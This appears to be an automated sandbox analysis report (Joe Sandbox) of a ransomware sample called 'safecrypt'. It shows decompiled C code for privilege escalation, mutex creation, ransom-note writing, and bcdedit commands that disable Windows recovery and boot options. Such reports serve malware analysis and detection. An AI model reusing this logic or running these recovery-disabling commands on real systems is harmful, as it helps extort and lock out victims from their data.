                    control_flow_graph 0 41f3e0-41f469 call 42dfb0 CoInitializeEx GdiplusStartup call 41f2f0 AllocateAndInitializeSid 5 41f493-41f640 SHGetFolderPathW call 4233b0 LoadLibraryW LoadStringW * 2 GetModuleHandleW GetProcAddress * 2 SHGetFolderPathW * 3 SHGetSpecialFolderPathW call 425aa2 * 3 SHGetFolderPathW * 3 GetModuleFileNameW call 426210 call 425aa2 DeleteFileW call 420440 LookupPrivilegeValueA 0->5 6 41f46b-41f47e CheckTokenMembership 0->6 23 41f642-41f646 call 4204d0 5->23 24 41f64b-41f65a call 41fc40 5->24 8 41f480 6->8 9 41f484-41f48f FreeSid 6->9 8->9 9->5 23->24 28 41f6c8-41f6cf call 41fd50 24->28 29 41f65c-41f665 24->29 40 41f6d1-41f6f5 call 412fc0 GetLastError 28->40 41 41f679-41f692 call 4256d3 28->41 30 41f695-41f69a 29->30 31 41f667 29->31 33 41f6a3 call 41fd50 30->33 36 41f69c-41f6a1 30->36 31->33 34 41f669-41f66b 31->34 42 41f6a8-41f6aa 33->42 38 41f674 call 41eb60 34->38 39 41f66d-41f672 34->39 36->33 36->40 38->41 39->38 39->40 40->41 52 41f6f7-41f8c0 call 42c770 GetVersionExW call 401470 call 41fff0 call 412fc0 CreateThread call 41f1c0 * 5 call 41eee0 call 420730 * 2 call 42c770 40->52 42->40 46 41f6ac-41f6c5 call 4256d3 42->46 80 41f8c5-41f8eb 52->80 80->80 81 41f8ed-41f908 call 42643b 80->81 84 41f90a-41f939 call 426482 call 4265fb 81->84 85 41f93c-41f95b call 420560 81->85 84->85 91 41f996-41f9a4 call 423420 85->91 92 41f95d-41f969 GdipAlloc 85->92 99 41f9a6-41f9c8 call 412fc0 91->99 100 41f9ca-41face CreateThread SetThreadPriority WaitForSingleObject call 42c770 call 414320 call 41fb80 call 420750 call 414320 call 41fbe0 call 420750 call 414320 GdipSaveImageToFile 91->100 94 41f96b-41f98c GdipCreateBitmapFromHBITMAP 92->94 95 41f98e 92->95 97 41f990 94->97 95->97 97->91 99->100 120 41fad0 100->120 121 41fad3-41fb76 call 420750 call 412fc0 * 4 call 41fec0 call 4256d3 100->121 120->121
                    C-Code - Quality: 43%
                    			E0041F3E0(void* __eflags, char _a8, char _a12, intOrPtr _a14, struct _SID_IDENTIFIER_AUTHORITY _a16, intOrPtr _a18, short _a20, intOrPtr _a22, char _a24, intOrPtr _a26, short _a30, char _a316, char _a332, char _a334, signed int _a8448, signed int _a8572, signed int _a8748) {
                    				struct _SECURITY_ATTRIBUTES* _v16;
                    				void* _v20;
                    				struct _SECURITY_ATTRIBUTES* _v28;
                    				void* _v32;
                    				char _v64;
                    				struct _LUID _v140;
                    				char _v143;
                    				char _v144;
                    				intOrPtr _v168;
                    				intOrPtr _v172;
                    				char _v176;
                    				char _v180;
                    				long _v200;
                    				char _v208;
                    				void* _v220;
                    				intOrPtr _v232;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t71;
                    				int _t76;
                    				_Unknown_base(*)()* _t85;
                    				intOrPtr _t100;
                    				int _t101;
                    				void* _t102;
                    				signed int _t103;
                    				intOrPtr* _t106;
                    				long _t108;
                    				intOrPtr* _t113;
                    				signed int _t127;
                    				signed int _t130;
                    				signed int _t133;
                    				signed int _t150;
                    				intOrPtr* _t152;
                    				intOrPtr* _t154;
                    				intOrPtr* _t156;
                    				void* _t157;
                    				intOrPtr* _t158;
                    				intOrPtr* _t163;
                    				intOrPtr _t168;
                    				signed int _t169;
                    				void* _t176;
                    				void* _t180;
                    				void* _t181;
                    				void* _t182;
                    				char* _t189;
                    				void* _t220;
                    				struct HINSTANCE__* _t222;
                    				struct HINSTANCE__* _t223;
                    				void* _t224;
                    				signed int _t225;
                    				void* _t226;
                    				void* _t227;
                    				void* _t228;
                    				void* _t229;
                    				intOrPtr* _t230;
                    				void* _t231;
                    				signed char* _t232;
                    				void* _t233;
                    				signed int _t234;
                    				void* _t236;
                    				signed int _t237;
                    				void* _t238;
                    				signed int _t240;
                    				signed int _t241;
                    				void* _t247;
                    				signed int _t248;
                    				void* _t257;
                    				void* _t258;
                    				void* _t263;
                    				void* _t274;
                    
                    				_t241 = _t240 & 0xfffffff8;
                    				E0042DFB0(0x2234);
                    				_t71 =  *0x43d01c; // 0xe0063daa
                    				_a8748 = _t71 ^ _t241;
                    				__imp__CoInitializeEx(0, 0, _t220, _t229, _t176); // executed
                    				_a8 = 1;
                    				_a12 = 0;
                    				_a16.Value = 0;
                    				_a20 = 0;
                    				__imp__GdiplusStartup( &_a24,  &_a8, 0); // executed
                    				E0041F2F0();
                    				_v16 = 0;
                    				_a16.Value = 0;
                    				_a20 = 0x500;
                    				_t76 = AllocateAndInitializeSid( &_a16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v20);
                    				_v16 = _t76;
                    				if(_t76 != 0) {
                    					__imp__CheckTokenMembership(0, _v20,  &_v16);
                    					if(_t76 == 0) {
                    						_v28 = 0;
                    					}
                    					FreeSid(_v32);
                    					_t76 = _v28;
                    				}
                    				_t230 = __imp__SHGetFolderPathW;
                    				 *0x480450 = _t76; // executed
                    				 *_t230(0, 0x1a, 0, 0, 0x46c450); // executed
                    				_a12 = 0;
                    				_a14 = 0;
                    				_a18 = 0;
                    				_a22 = 0;
                    				_a26 = 0;
                    				_a30 = 0;
                    				E004233B0( &_a12, 9); // executed
                    				_t222 = LoadLibraryW(L"Shell32.dll");
                    				LoadStringW(_t222, 0x5509, 0x470450, 0xff); // executed
                    				LoadStringW(_t222, 0x5527, 0x472450, 0xff);
                    				_t223 = GetModuleHandleW(L"KERNEL32");
                    				 *0x480454 = GetProcAddress(_t223, "Wow64DisableWow64FsRedirection");
                    				_t85 = GetProcAddress(_t223, "Wow64RevertWow64FsRedirection");
                    				 *0x480458 = _t85; // executed
                    				 *_t230(0, 0x24, 0, 0, 0x476450); // executed
                    				 *_t230(0, 0x26, 0, 0, 0x478450); // executed
                    				 *_t230(0, 0x3b, 0, 0, 0x47c450); // executed
                    				__imp__SHGetSpecialFolderPathW(0, 0x47e450, 5, 0); // executed
                    				E00425AA2(0x47e450, 0x1000, L"\\recover_file_");
                    				E00425AA2(0x47e450, 0x1000,  &_v64);
                    				E00425AA2(0x47e450, 0x1000, L".txt");
                    				 *_t230(0, 0x10, 0, 0, 0x46e450); // executed
                    				 *_t230(0, 0x19, 0, 0, 0x474450); // executed
                    				 *_t230(0, 0x23, 0, 0, 0x47a450); // executed
                    				GetModuleFileNameW(0, 0x46a450, 0x1000);
                    				E00426210(0x468450, 0x1000, 0x46a450);
                    				E00425AA2(0x468450, 0x1000, L":Zone.Identifier");
                    				_t247 = _t241 + 0x44;
                    				DeleteFileW(0x468450); // executed
                    				_t100 = E00420440(); // executed
                    				 *0x460a78 = _t100; // executed
                    				_t101 = LookupPrivilegeValueA(0, "SeDebugPrivilege",  &_v140); // executed
                    				if(_t101 != 0) {
                    					E004204D0( &_a12,  &_v140); // executed
                    				}
                    				_t205 =  &_v176;
                    				_t102 = E0041FC40( &_v176); // executed
                    				_t248 = _t247 + 4;
                    				if(_t102 == 0) {
                    					_t103 = E0041FD50(0, __eflags);
                    					__eflags = _t103;
                    					if(_t103 != 0) {
                    						goto L12;
                    					} else {
                    						goto L18;
                    					}
                    				} else {
                    					_t168 = _v176;
                    					_t274 = _t168 - 0x2000;
                    					if(_t274 > 0) {
                    						__eflags = _t168 - 0x3000;
                    						if(__eflags == 0) {
                    							goto L15;
                    						} else {
                    							__eflags = _t168 - 0x4000;
                    							if(__eflags != 0) {
                    								goto L18;
                    							} else {
                    								goto L15;
                    							}
                    						}
                    					} else {
                    						if(_t274 == 0) {
                    							L15:
                    							_t169 = E0041FD50(0, __eflags); // executed
                    							__eflags = _t169;
                    							if(_t169 == 0) {
                    								goto L18;
                    							} else {
                    								_pop(_t228);
                    								_pop(_t238);
                    								_pop(_t182);
                    								__eflags = _a8572 ^ _t248;
                    								return E004256D3(1, _t182, _a8572 ^ _t248, _t205, _t228, _t238);
                    							}
                    						} else {
                    							if(_t168 == 0 || _t168 == 0x1000) {
                    								E0041EB60();
                    								goto L12;
                    							} else {
                    								L18:
                    								_t106 = E00412FC0(_t205, 0, 1, 0xbf78968a);
                    								_t248 = _t248 + 0xc;
                    								 *_t106(0, 0, L"__sys_234238233295");
                    								_t108 = GetLastError();
                    								__eflags = _t108 - 0xb7;
                    								if(_t108 == 0xb7) {
                    									L12:
                    									_pop(_t224);
                    									_pop(_t231);
                    									_pop(_t180);
                    									return E004256D3(1, _t180, _a8572 ^ _t248, _t205, _t224, _t231);
                    								} else {
                    									E0042C770(0x43f9f0, 0, 0x11c);
                    									0x43f9f0->dwOSVersionInfoSize = 0x11c;
                    									GetVersionExW(0x43f9f0);
                    									E00401470(0, _t223, __eflags);
                    									E0041FFF0(__eflags);
                    									 *0x46844c = 1;
                    									_t113 = E00412FC0(_t205, 0, 1, 0x6fb89af0);
                    									 *_t113(0, 0, E00420200, 0, 0, 0);
                    									_v200 = 0;
                    									CreateThread(0, 0, E0041ED00, 0, 0,  &_v200);
                    									E0041F1C0("bcdedit.exe /set {current} bootems off");
                    									E0041F1C0("bcdedit.exe /set {current} advancedoptions off");
                    									E0041F1C0("bcdedit.exe /set {current} optionsedit off");
                    									E0041F1C0("bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures");
                    									E0041F1C0("bcdedit.exe /set {current} recoveryenabled off");
                    									E0041EEE0(_t223);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									E00420730(0x3a98, 0x460b30,  *0x460aac, 0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									_push(0x43fee0);
                    									E00420730(0x3a98, 0x4647c0,  *0x4647bc, 0x43fee0);
                    									_v144 = 0;
                    									E0042C770( &_v143, 0, 0x1df);
                    									_t257 = _t248 + 0xe4;
                    									_t189 =  &_v144;
                    									_t232 = 0x43ff40;
                    									do {
                    										_t127 =  *_t232 & 0x000000ff;
                    										_t38 =  &(("0123456789ABCDEF")[_t127 >> 4]); // 0x33323130
                    										_t211 =  *_t38;
                    										_t39 =  &(("0123456789ABCDEF")[_t127 & 0x0000000f]); // 0x33323130
                    										 *_t189 =  *_t38;
                    										 *((char*)(_t189 + 1)) =  *_t39;
                    										_t232 =  &(_t232[1]);
                    										_t189 = _t189 + 2;
                    										__eflags = _t232 - 0x43ffa1;
                    									} while (_t232 != 0x43ffa1);
                    									 *_t189 = 0;
                    									_t130 = E0042643B( &_v208, 0x47e450, L"w+");
                    									_t258 = _t257 + 0xc;
                    									__eflags = _t130;
                    									if(__eflags == 0) {
                    										_push( *0x460a78);
                    										_push(0x43fee0);
                    										_push( &_v144);
                    										_push(0x43ff10);
                    										_push("%s\n%s\n%S\n%d\n");
                    										_push(_v208);
                    										E00426482(0, _t223, _t232, __eflags);
                    										_t211 = _v208;
                    										_push(_v208);
                    										E004265FB(0, _t223, _t232, __eflags);
                    										_t258 = _t258 + 0x1c;
                    									}
                    									_v176 = 0;
                    									_v172 = 0;
                    									_v168 = 0;
                    									_v180 = 0;
                    									_t133 = E00420560( &_v180);
                    									_t225 = _t133;
                    									__eflags = _t225;
                    									if(_t225 != 0) {
                    										__imp__GdipAlloc(0x10);
                    										_t237 = _t133;
                    										__eflags = _t237;
                    										if(_t237 == 0) {
                    											_t237 = 0;
                    											__eflags = 0;
                    										} else {
                    											_t133 =  &_v220;
                    											 *_t237 = 0x439e88;
                    											_v220 = 0;
                    											__imp__GdipCreateBitmapFromHBITMAP(_t225, 0, _t133);
                    											 *(_t237 + 8) = _t133;
                    											 *((intOrPtr*)(_t237 + 4)) = _v232;
                    										}
                    										 *0x480484 = _t237;
                    									}
                    									E00423420(_t133);
                    									_t226 = 0;
                    									__eflags =  *0x43fed4 - 1;
                    									if( *0x43fed4 == 1) {
                    										 *0x460a7c = 0;
                    										_t163 = E00412FC0(_t211, 0, 1, 0x6fb89af0);
                    										_t258 = _t258 + 0xc;
                    										_t226 =  *_t163(0, 0, E0041B6A0, 0, 0, 0);
                    									}
                    									_t233 = CreateThread(0, 0, E00413860, 0, 0, 0);
                    									SetThreadPriority(_t233, 0xfffffff1);
                    									WaitForSingleObject(_t233, 0xffffffff);
                    									_a332 = 0;
                    									E0042C770( &_a334, 0, 0x1ffe);
                    									E00414320(0x1000,  &_a332, L"%s\\help_recover_instructions.TXT", 0x46e450);
                    									E0041FB80( &_a332,  &_a332);
                    									E00420750( &_a332, L"open");
                    									E00414320(0x1000,  &_a332, L"%s\\help_recover_instructions%s", 0x46e450);
                    									E0041FBE0( &_a332,  &_a332);
                    									E00420750( &_a332, L"open");
                    									E00414320(0x1000,  &_a332, L"%s\\help_recover_instructions.png", 0x46e450);
                    									_t150 =  *0x480484;
                    									_t217 =  *((intOrPtr*)(_t150 + 4));
                    									_t263 = _t258 + 0x3c;
                    									_t234 = _t150;
                    									__imp__GdipSaveImageToFile( *((intOrPtr*)(_t150 + 4)),  &_a332, 0x43f9e0, 0, L".HTM");
                    									__eflags = _t150;
                    									if(_t150 != 0) {
                    										 *(_t234 + 8) = _t150;
                    									}
                    									E00420750( &_a316, L"open");
                    									_t152 = E00412FC0(_t217, 0, 1, 0x6fb89af0);
                    									 *_t152(0, 0, E0041ED00, 0, 0, 0);
                    									_t154 = E00412FC0(_t217, 0, 1, 0xc54374f3);
                    									 *_t154(_t226, 0x493e0);
                    									 *0x460a7c = 1;
                    									_t156 = E00412FC0(_t217, 0, 1, 0x6fb89af0);
                    									_t157 =  *_t156(0, 0, E0041B6A0, 0, 0, 0);
                    									_t158 = E00412FC0(_t217, 0, 1, 0xc54374f3);
                    									 *_t158();
                    									E0041FEC0(0, _t217, _t226, _t157, __eflags);
                    									_t227 = _t157;
                    									_t236 = 0xea60;
                    									_pop(_t181);
                    									__eflags = 0;
                    									return E004256D3(0, _t181, _a8448 ^ _t263 + 0x34, _t217, _t227, _t236);
                    								}
                    							}
                    						}
                    					}
                    				}
                    			}











































































                    0x0041f3e3
                    0x0041f3eb
                    0x0041f3f0
                    0x0041f3f7
                    0x0041f405
                    0x0041f416
                    0x0041f41e
                    0x0041f422
                    0x0041f426
                    0x0041f42a
                    0x0041f430
                    0x0041f44e
                    0x0041f452
                    0x0041f456
                    0x0041f45d
                    0x0041f463
                    0x0041f469
                    0x0041f476
                    0x0041f47e
                    0x0041f480
                    0x0041f480
                    0x0041f489
                    0x0041f48f
                    0x0041f48f
                    0x0041f493
                    0x0041f4a3
                    0x0041f4a8
                    0x0041f4b5
                    0x0041f4ba
                    0x0041f4be
                    0x0041f4c2
                    0x0041f4c6
                    0x0041f4ca
                    0x0041f4cf
                    0x0041f4f2
                    0x0041f4fa
                    0x0041f50c
                    0x0041f51f
                    0x0041f52f
                    0x0041f534
                    0x0041f542
                    0x0041f547
                    0x0041f553
                    0x0041f55f
                    0x0041f56a
                    0x0041f57f
                    0x0041f596
                    0x0041f5ad
                    0x0041f5bf
                    0x0041f5cb
                    0x0041f5d7
                    0x0041f5e4
                    0x0041f5f9
                    0x0041f610
                    0x0041f615
                    0x0041f61d
                    0x0041f623
                    0x0041f633
                    0x0041f638
                    0x0041f640
                    0x0041f646
                    0x0041f646
                    0x0041f64b
                    0x0041f650
                    0x0041f655
                    0x0041f65a
                    0x0041f6c8
                    0x0041f6cd
                    0x0041f6cf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041f65c
                    0x0041f65c
                    0x0041f660
                    0x0041f665
                    0x0041f695
                    0x0041f69a
                    0x00000000
                    0x0041f69c
                    0x0041f69c
                    0x0041f6a1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041f6a1
                    0x0041f667
                    0x0041f667
                    0x0041f6a3
                    0x0041f6a3
                    0x0041f6a8
                    0x0041f6aa
                    0x00000000
                    0x0041f6ac
                    0x0041f6b1
                    0x0041f6b2
                    0x0041f6b3
                    0x0041f6bb
                    0x0041f6c5
                    0x0041f6c5
                    0x0041f669
                    0x0041f66b
                    0x0041f674
                    0x00000000
                    0x0041f6d1
                    0x0041f6d1
                    0x0041f6d9
                    0x0041f6de
                    0x0041f6e8
                    0x0041f6ea
                    0x0041f6f0
                    0x0041f6f5
                    0x0041f679
                    0x0041f67e
                    0x0041f67f
                    0x0041f680
                    0x0041f692
                    0x0041f6f7
                    0x0041f702
                    0x0041f70f
                    0x0041f719
                    0x0041f71f
                    0x0041f724
                    0x0041f731
                    0x0041f73b
                    0x0041f74d
                    0x0041f75d
                    0x0041f761
                    0x0041f76c
                    0x0041f779
                    0x0041f786
                    0x0041f793
                    0x0041f7a0
                    0x0041f7a8
                    0x0041f7ad
                    0x0041f7b2
                    0x0041f7bd
                    0x0041f7c2
                    0x0041f7c7
                    0x0041f7cc
                    0x0041f7d1
                    0x0041f7d6
                    0x0041f7db
                    0x0041f7e0
                    0x0041f7e5
                    0x0041f7ea
                    0x0041f7ff
                    0x0041f807
                    0x0041f80c
                    0x0041f811
                    0x0041f816
                    0x0041f81b
                    0x0041f820
                    0x0041f825
                    0x0041f82a
                    0x0041f82f
                    0x0041f834
                    0x0041f839
                    0x0041f83e
                    0x0041f843
                    0x0041f848
                    0x0041f84d
                    0x0041f858
                    0x0041f85d
                    0x0041f862
                    0x0041f867
                    0x0041f86c
                    0x0041f871
                    0x0041f876
                    0x0041f87b
                    0x0041f880
                    0x0041f885
                    0x0041f89a
                    0x0041f8ad
                    0x0041f8b4
                    0x0041f8b9
                    0x0041f8bc
                    0x0041f8c0
                    0x0041f8c5
                    0x0041f8c5
                    0x0041f8cd
                    0x0041f8cd
                    0x0041f8d6
                    0x0041f8dc
                    0x0041f8de
                    0x0041f8e1
                    0x0041f8e2
                    0x0041f8e5
                    0x0041f8e5
                    0x0041f8f2
                    0x0041f8fe
                    0x0041f903
                    0x0041f906
                    0x0041f908
                    0x0041f914
                    0x0041f915
                    0x0041f91e
                    0x0041f91f
                    0x0041f924
                    0x0041f929
                    0x0041f92a
                    0x0041f92f
                    0x0041f933
                    0x0041f934
                    0x0041f939
                    0x0041f939
                    0x0041f93e
                    0x0041f942
                    0x0041f946
                    0x0041f94e
                    0x0041f952
                    0x0041f957
                    0x0041f959
                    0x0041f95b
                    0x0041f95f
                    0x0041f965
                    0x0041f967
                    0x0041f969
                    0x0041f98e
                    0x0041f98e
                    0x0041f96b
                    0x0041f96b
                    0x0041f972
                    0x0041f978
                    0x0041f97c
                    0x0041f986
                    0x0041f989
                    0x0041f989
                    0x0041f990
                    0x0041f990
                    0x0041f996
                    0x0041f99b
                    0x0041f99d
                    0x0041f9a4
                    0x0041f9ae
                    0x0041f9b4
                    0x0041f9b9
                    0x0041f9c8
                    0x0041f9c8
                    0x0041f9da
                    0x0041f9df
                    0x0041f9e8
                    0x0041f9fe
                    0x0041fa06
                    0x0041fa25
                    0x0041fa34
                    0x0041fa45
                    0x0041fa69
                    0x0041fa75
                    0x0041fa86
                    0x0041faa5
                    0x0041faaa
                    0x0041faaf
                    0x0041fab2
                    0x0041fac4
                    0x0041fac6
                    0x0041facc
                    0x0041face
                    0x0041fad0
                    0x0041fad0
                    0x0041fadf
                    0x0041faef
                    0x0041fb01
                    0x0041fb0b
                    0x0041fb19
                    0x0041fb23
                    0x0041fb2d
                    0x0041fb3f
                    0x0041fb4b
                    0x0041fb59
                    0x0041fb5b
                    0x0041fb67
                    0x0041fb68
                    0x0041fb69
                    0x0041fb6c
                    0x0041fb76
                    0x0041fb76
                    0x0041f6f5
                    0x0041f66b
                    0x0041f667
                    0x0041f665

                    APIs
                    • CoInitializeEx.OLE32(00000000,00000000), ref: 0041F405
                    • GdiplusStartup.GDIPLUS(?,?,?,?,?,?,?,00000000), ref: 0041F42A
                      • Part of subcall function 0041F2F0: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0041F308
                    • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0041F45D
                    • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041F476
                    • FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0041F489
                    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,0046C450,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000), ref: 0041F4A8
                    • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041F4DC
                    • LoadStringW.USER32(00000000,00005509,00470450,000000FF), ref: 0041F4FA
                    • LoadStringW.USER32(00000000,00005527,00472450,000000FF), ref: 0041F50C
                    • GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041F513
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041F527
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041F534
                    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,00476450), ref: 0041F547
                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,00478450), ref: 0041F553
                    • SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,0047C450), ref: 0041F55F
                    • SHGetSpecialFolderPathW.SHELL32(00000000,0047E450,00000005,00000000), ref: 0041F56A
                    • SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,0046E450), ref: 0041F5BF
                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,00474450), ref: 0041F5CB
                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0047A450), ref: 0041F5D7
                    • GetModuleFileNameW.KERNEL32(00000000,0046A450,00001000), ref: 0041F5E4
                    • DeleteFileW.KERNELBASE(00468450), ref: 0041F61D
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041F638
                    • GetLastError.KERNEL32 ref: 0041F6EA
                    • _memset.LIBCMT ref: 0041F702
                    • GetVersionExW.KERNEL32(0043F9F0), ref: 0041F719
                    • CreateThread.KERNEL32 ref: 0041F761
                      • Part of subcall function 0041FD50: _memset.LIBCMT ref: 0041FD7F
                      • Part of subcall function 0041FD50: PathFindFileNameW.SHLWAPI(0046A450,?,00000000,74A33620,?,0041F6CD), ref: 0041FD97
                      • Part of subcall function 0041FD50: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDD2
                      • Part of subcall function 0041FD50: GetLastError.KERNEL32(?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDDA
                      • Part of subcall function 0041FD50: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FDE3
                      • Part of subcall function 0041FD50: CopyFileW.KERNELBASE(0046A450,?,00000000,?,?,?,?,?,?,?,?,?,00000000,74A33620,?,0041F6CD), ref: 0041FE2E
                      • Part of subcall function 0041FD50: _memset.LIBCMT ref: 0041FE3B
                      • Part of subcall function 0041FD50: CreateProcessW.KERNELBASE ref: 0041FE82
                    • _memset.LIBCMT ref: 0041F8B4
                    • __wfopen_s.LIBCMT ref: 0041F8FE
                    • _fprintf.LIBCMT ref: 0041F92A
                    • GdipAlloc.GDIPLUS(00000010), ref: 0041F95F
                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 0041F97C
                    • CreateThread.KERNEL32 ref: 0041F9D4
                    • SetThreadPriority.KERNEL32(00000000,000000F1), ref: 0041F9DF
                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041F9E8
                    • _memset.LIBCMT ref: 0041FA06
                      • Part of subcall function 00414320: __strftime_l.LIBCMT ref: 00414335
                      • Part of subcall function 0041FB80: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,00000000), ref: 0041FB9F
                      • Part of subcall function 0041FB80: WriteFile.KERNEL32(00000000,00460B30,00460B31,00000000,00000000), ref: 0041FBCA
                      • Part of subcall function 0041FB80: CloseHandle.KERNEL32(00000000), ref: 0041FBD1
                      • Part of subcall function 0041FBE0: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,?,?,0041FA7A,?,%s\help_recover_instructions%s,0046E450), ref: 0041FBFF
                      • Part of subcall function 0041FBE0: WriteFile.KERNEL32(00000000,004647C0,004647C1,00000000,00000000,?,?,0041FA7A,?,%s\help_recover_instructions%s,0046E450), ref: 0041FC2A
                      • Part of subcall function 0041FBE0: CloseHandle.KERNEL32(00000000,?,?,0041FA7A,?,%s\help_recover_instructions%s,0046E450), ref: 0041FC31
                    • GdipSaveImageToFile.GDIPLUS(?,?,0043F9E0,00000000), ref: 0041FAC6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Path$Folder$Create$_memset$Gdip$CloseHandleLoadThread$AddressErrorFindImageInitializeLastModuleNameProcStringWrite$AllocAllocateBitmapChangeCheckCopyDeleteEncodersFreeFromGdiplusLibraryLookupMembershipNotificationObjectPriorityPrivilegeProcessSaveSingleSizeSpecialStartupTokenValueVersionWait__strftime_l__wfopen_s_fprintf
                    • String ID: %s%s%S%d$%s\help_recover_instructions%s$%s\help_recover_instructions.TXT$%s\help_recover_instructions.png$.HTM$.txt$:Zone.Identifier$KERNEL32$SeDebugPrivilege$Shell32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$\recover_file_$__sys_234238233295$bcdedit.exe /set {current} advancedoptions off$bcdedit.exe /set {current} bootems off$bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures$bcdedit.exe /set {current} optionsedit off$bcdedit.exe /set {current} recoveryenabled off$open$open$open
                    • API String ID: 640529482-1698839232
                    • Opcode ID: 6e2db5cdae60dd38e21312d843d42def29c00d9962bb268c63cd5ffe4e74ecdd
                    • Instruction ID: cc934a40bf3e605feebb8dba357d231c25b4dac63f2f53ec82a99aa1ed34d38a
                    • Opcode Fuzzy Hash: 6e2db5cdae60dd38e21312d843d42def29c00d9962bb268c63cd5ffe4e74ecdd
                    • Instruction Fuzzy Hash: F4F11AB16403007FD210AB61AC87FAB77ACDB8874CF10583FF545A2192EABC9D45876E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 89%
                    			E004204D0(intOrPtr __edx, intOrPtr __esi) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				struct _TOKEN_PRIVILEGES _v24;
                    				void* _v28;
                    				signed int _t13;
                    				intOrPtr _t24;
                    				intOrPtr _t31;
                    				intOrPtr _t34;
                    				signed int _t36;
                    
                    				_t31 = __edx;
                    				_t13 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t13 ^ _t36;
                    				if(OpenProcessToken(GetCurrentProcess(), 0x20028,  &_v28) != 0) {
                    					_v24.Privileges =  *((intOrPtr*)(__esi));
                    					_v24.PrivilegeCount = 1;
                    					_v16 =  *((intOrPtr*)(__esi + 4));
                    					_v12 = 2;
                    					AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0); // executed
                    					FindCloseChangeNotification(_v28); // executed
                    					return E004256D3(1, _t24, _v8 ^ _t36, _v28, _t34, __esi);
                    				} else {
                    					return E004256D3(_t17, _t24, _v8 ^ _t36, _t31, _t34, __esi);
                    				}
                    			}













                    0x004204d0
                    0x004204d6
                    0x004204dd
                    0x004204f8
                    0x00420517
                    0x00420520
                    0x00420527
                    0x0042052a
                    0x00420531
                    0x0042053b
                    0x00420553
                    0x004204fa
                    0x00420507
                    0x00420507

                    APIs
                    • GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041F64B), ref: 004204E9
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041F64B), ref: 004204F0
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00420531
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0042053B
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
